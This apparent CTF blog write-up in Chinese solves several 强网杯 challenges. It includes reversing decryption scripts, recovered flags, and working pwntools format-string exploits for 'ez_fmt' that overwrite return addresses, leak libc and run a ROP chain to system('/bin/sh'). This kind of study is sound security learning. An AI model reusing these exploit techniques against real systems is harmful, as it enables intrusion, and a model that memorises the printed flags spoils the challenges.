感觉现在比赛越来越难了,只作了几个小题,赛后把看到的wp复现到的也一并记录一下。
misc/fuzz
这就是个猜数的题,哪个数字对了就在哪一位上显示1一共9位,不过服务器返回的前两个并不一定正确,多试几把。
Enter a string (should be less than 10 bytes): abcd
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 123456
Here is your code coverage: 000000000
Please try again. If you can reach all 1 in the coverage, you will win!
Enter a string (should be less than 10 bytes): 1234567890
Here is your code coverage: 000000000
先把所有字符都输入一遍找到是1的后7个字符,再试前两个,幸运的时候就成了。会显示正确的。拿到9位就给flag
from pwn import *
#context.log_level = 'debug'
#p = remote('120.24.69.11', 12199)
p = remote('101.200.122.251', 12177)
for i in range(0x21,0x7f):
#p.sendlineafter(b'(should be less than 10 bytes):', ('GoqwbGood').encode())
p.sendlineafter(b'(should be less than 10 bytes):', (chr(i)+chr(i)).encode() + b'qwbGood')
p.recvuntil(b'coverage: ')
v = p.recv(9)
if v != b'0'*9:
print(v, chr(i))
强网先锋/babyre
很容易拿到是个tea加密,但是解出来不对。应该是反调啥的。TlsCallback_0_0,TlsCallback_1_0两个函数里面把密文和密钥改了。
拿到正确的密文密钥就能解密
from pwn import *
from ctypes import *
c = [0x89DEC7979621F3E0,0x0D2FC5DB08D62CA9B,0x9B76A850421C5589,0x0DE11CF7C2FC6B2EA]
c = b''.join([p64(i) for i in c])
#TlsCallback_1_0
c = bytes([c[i]^i for i in range(32)])
c = [u32(c[i:i+4]) for i in range(0,32,4)]
print([hex(i) for i in c])
#TlsCallback_0_0
#key = [0x31,0xb7,0xb6,0x31]
key = [0x62,0x6f,0x6d,0x62]
def tea(v,k):
v0 = c_uint32(v[0])
v1 = c_uint32(v[1])
delta = 0x77BF7F99
sum1 = c_uint32(0x90508D47 - delta * 33 * 4)
for i in range(4*33):
sum1.value += delta
v1.value -= (((v0.value<<5)^(v0.value>>4))+v0.value)^(sum1.value + key[(sum1.value>>11)&3])
v0.value -= (((v1.value<<5)^(v1.value>>4))+v1.value)^(sum1.value + key[sum1.value&3]) ^ sum1.value
print(p32(v0.value)+p32(v1.value))
return p32(v0.value)+p32(v1.value)
flag = b''
for i in range(0,8,2):
flag +=tea(c[i:i+2], key)
print(flag)
#flag{W31com3_2_Th3_QwbS7_4nd_H4v3_Fun}
强网先锋/ezre
程序作了混淆,手搓的(后来听说用D810扁平化,但没安上。)好在程序很短,一步步跟着来,大概流程是:b64enc->b64dec->b64enc->b64dec->b64enc->加密->比较
但是每次码表都会变,而且还有反调,在gdb里把反调的值改为0,然后跟进拿到5个码表和最后加密的密钥(相当于第6个码表),先用密文解一步,然后放厨子里用5个码表解base64
c = bytes.fromhex('3A2C4B516846596324045E5F000C2B03295C74706A627F3D2C4E6F13060D060C4D560F284D5176702B05516848552419')
'''
b64
for i in 4:
交换码表
enc2
码表异或
enc
比较
'''
def enc(c):
v9 = b"SFNrIBmnOL\020Vt~bMc\026lJ\036"
v11 = 2023
v10 = 0
va = []
for i in range(48):
if v10%3 == 0:
v11 = (v11+3)%17
v7 = v9[v11+3]
elif v10%3== 1:
v11 = (v11+5)%20
v7 = v9[v11+1]
else:
v11 = (v11+7)%19
v7 = v9[v11+2]
va.append(v7)
v10+=1
print([hex(i) for i in va])
tc = [i for i in c]
for v in range(len(c)-1,0,-1):
tc[v]^=tc[v-1]
tc[v-1]^=va[v-1]
print(bytes(tc))
return bytes(tc)
#"kNIVkNIVkNIVkNLqkrLqkrLqkrL8kEX8kEX8kEX8ktktkA=="
#c = b"\006\004[DABAY\"\016Qj\021!#?\030|yf@xz\033\022vW\177jaT ]Qg\02238p*WN5?\0326Gz"
c4 = enc(c)
print(c4)
c3 = bytes.fromhex('f0 54 52 f3 62 46 f2 b9 c1 13 e2 14 f7 61 d5 f2 b4 b9 bc 69 c1 3d 4f 5e f3 94 15 c7 94 34 ea a5 b7 28')
#用5个码表base64编解码
tab1 = b"FGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u+7rad5CxljMXvNTBkm/8"
tab2 = b"Hc0xwuZmy3DpQnSgj2LhUtrlVvNYks+BX/MOoETaKqR4eb9WF8ICGzf6id1P75JA"
tab3 = b"pnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNb+Mf0YVd5L8c97/WkOTtuKFZyRBUPX6a"
tab4 = b"plxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/b+dycGPRMwWfr6"
tab0 = b"l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr"
c1 = 'B6gtBdq8BGN1VX+yIdECBGt9a8N1TyIvB9hCo9hDA543uF=='
#flag{3ea590ccwxehg715264fzxnzepqz}强网先锋/speedUp
这题给的很少,只有一个2^27!,flag 是每位数字和作sha256
不知道是不是弯路走远了。先在sage里求这个2^27的阶乘,然后存文件里,读成bytes再加。这样可能占用内存会小点,因为这个数字将近1G那么大。不保证是优解,运行几十分钟。
sage: x = factorial(2^27)
sage: open('aaa.txt','w').write(str(x))
1032606162
>>> a = open('aaa.txt', 'rb').read()
>>> res = 0
>>> for i in a:
... res += i-0x30
...
>>> from hashlib import sha256
>>> sha256(str(res).encode()).hexdigest()
'bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797'强网先锋/ez_fmt
这是看的别人的wp,原来格式化字符串还有*d参数
%Nc%*A$d%B$n
第1段%Nc是输入N个字符,
第2段里A是一个偏移(本题反回地址是偏移19),会输出偏移位置的值个字符,这里用__libc_start_main_ret这个值
前两部分输出的值(特别大)就是把libc_start_main_ret+offset = one
第3部分B是偏移(payload里的栈地址指向返回地址,也就是偏移19这个位置)这里把前边的这个数写到偏移处指针指向的地址,也就实现了把_libc_start_main_ret改为one
from pwn import *
context(arch='amd64', log_level='debug')
#p = process('./ez_fmt')
p = remote('47.104.24.40', 1337)
p.recvuntil(b"you ")
stack = int(p.recvline(), 16)
#one = 0xe3b01
'''
gef➤ p 0xe3b01+0x00007ffff7dd5000
$1 = 0x7ffff7eb8b01
gef➤ p $1-0x00007ffff7df9083
$2 = 0xbfa7e
'''
v1 = 0xbfa7e #one-__libc_start_main_ret
pay = f"%{v1}c%*19$d%9$n".ljust(0x18, 'a').encode() + p64(stack+0x68)
p.send(pay)
p.recvuntil(b'aaa')
p.sendline(b'cat /flag')
p.interactive()
这种方法的问题就是输出一个libc地址再写,这个libc地址巨大,linux虚拟上可能就会挂掉,在windows上不会挂。看了另外一个WP是打的printf的返回地址。恍然大悟。
写buf-8处的printf函数的返回地址,先将这个地址写为start只需要写两个字节,同时泄露libc地址,第二次执行时将这个地址改为ppp6的值(pop r14;pop r15;ret)跳过payload前部分去执行后边的rop,这样可以避免one的相关限制。
from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./ez_fmt')
libc = ELF('./libc-2.31.so')
p = process('./ez_fmt')
#p = remote('47.104.24.40', 1337)
#----------------------------------
p.recvuntil(b"you ")
stack = int(p.recvline(), 16)
#printf_ret -> start 将函数printf的返回地址改为start,printf结束后重新调起start,不会执行到w=0,同时泄露libc地址
#0x40123e -> 0x4010b0
pay = f"%{0x10b0}c%11$hn%19$p".ljust(0x18,'A').encode() + flat(stack-0xe8,stack-0xe8+1, stack-8)
p.send(pay)
p.recvuntil(b'0x')
libc.address = int(p.recv(12),16) - 243 - libc.sym['__libc_start_main']
print(f"{ libc.address = :x}")
pop_rdi = 0x4012d3
bin_sh = next(libc.search(b'/bin/sh\x00'))
system = libc.sym['system']
#------------------------------------
#gdb.attach(p, "b*0x401239\nc")
p.recvuntil(b"you ")
stack = int(p.recvline(), 16)
#把printf的返回地址改为ppp2 跳到后边的rop
#0x40123e -> 0x4012d0 ppp2
pay = f"%{0xd0}c%11$hhn".encode().ljust(0x10, b'\x00') + flat(pop_rdi, bin_sh, system, stack-8)
p.send(pay)
p.interactive()
REV/ezre
这个看到别人WP感觉如此简单,也是混淆过的,从特征上看是SM4加密。而且是标准的,密钥和密文都给了,直接上厨子就行。
2594
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
